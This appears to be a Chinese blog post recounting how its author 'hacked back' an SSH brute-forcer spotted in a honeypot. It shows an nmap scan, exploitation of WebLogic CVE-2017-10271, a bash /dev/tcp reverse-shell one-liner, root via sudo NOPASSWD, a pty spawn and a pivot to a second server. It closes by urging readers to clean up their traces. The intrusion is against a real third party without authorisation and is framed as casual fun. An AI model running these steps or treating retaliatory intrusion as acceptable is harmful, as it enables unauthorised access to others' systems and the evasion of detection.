渗透测试|记一次利用蜜罐反日对方的简单过程

TRY 345 4

诗无尽头 - 唯有自由才能触摸虚无的自我

来自:一言

前言

[aru_3]闲来无事做,就看看自己布置的蜜罐,看看能不能发现到什么好玩的东西。然后一看,有几个爆破ssh的表哥。如下图。

渗透测试|记一次利用蜜罐反日对方的简单过程

既然表哥们扫我,那我肯定也要扫回去咯,看看能不能发现点东西。于是就开始了这次的测试,这次就先搞搞这个来自美国的表哥:

渗透测试|记一次利用蜜罐反日对方的简单过程

测试开始

1.使用nmap对目标进行端口信息收集。

nmap -A  XXX.XXX.XXX.145

渗透测试|记一次利用蜜罐反日对方的简单过程

温馨提示

通过扫描结果可以得知,目标开启了22端口,111端口,8088端口和8089端口,而且使用的是WebLogic 12.1.3.0,weblogic这个版本正好有漏洞,可以去看看我之前写的复现文章~渗透测试|Weblogic漏洞复现与修复

2.使用weblogic的exp反弹shell。

打开weblogic的端口页面查看版本号。

渗透测试|记一次利用蜜罐反日对方的简单过程

可以得知使用的是:WebLogic Server 版本: 12.1.3.0.0

然后这个版本存在反序列化漏洞可以远程执行命令:

CVE编号:CVE-2017-10271

直接拿起工具检测打过去,如下图

渗透测试|记一次利用蜜罐反日对方的简单过程

目标存在漏洞[aru_3],然后查看权限为opc,直接执行命令反弹shell试试。

bash -i >& /dev/tcp/你的服务器ip/444 0>&1    #需要在你的服务器上用nc监听444端口

渗透测试|记一次利用蜜罐反日对方的简单过程

成功反弹,不过权限是opc,还不是root权限,先用history命令查看管理员干过些啥子事情。

3.获取root权限

渗透测试|记一次利用蜜罐反日对方的简单过程

通过历史命令可以看到管理员执行过sudo命令,然后可以通过sudo -l来查看当前用户可以切换啥身份执行啥命令。

渗透测试|记一次利用蜜罐反日对方的简单过程

温馨提示

NOPASSWD,不需要密码 ,后面ALL,可以执行任何命令,那就没得说了,直接切换到root权限![aru_4]

切换root权限。

sudo bash

渗透测试|记一次利用蜜罐反日对方的简单过程

不过这个界面不好操作,再用python搞个终端。

python -c 'import pty;pty.spawn("/bin/bash")'

渗透测试|记一次利用蜜罐反日对方的简单过程

温馨提示

拿到root权限了,然后之前用opt权限查看的历史命令里管理员还对另外一台服务器进行了远程文件复制,然后测试了一下,也是使用的weblogic,所以继续拿权限。

最后要记得清理痕迹哦。

发表评论 取消回复
表情 图片 链接 代码

  1. 11
    11 Lv 1

    表哥,用的啥蜜罐能推荐下吗

  2. god
    god Lv 1

    表哥,那个检测工具用的啥?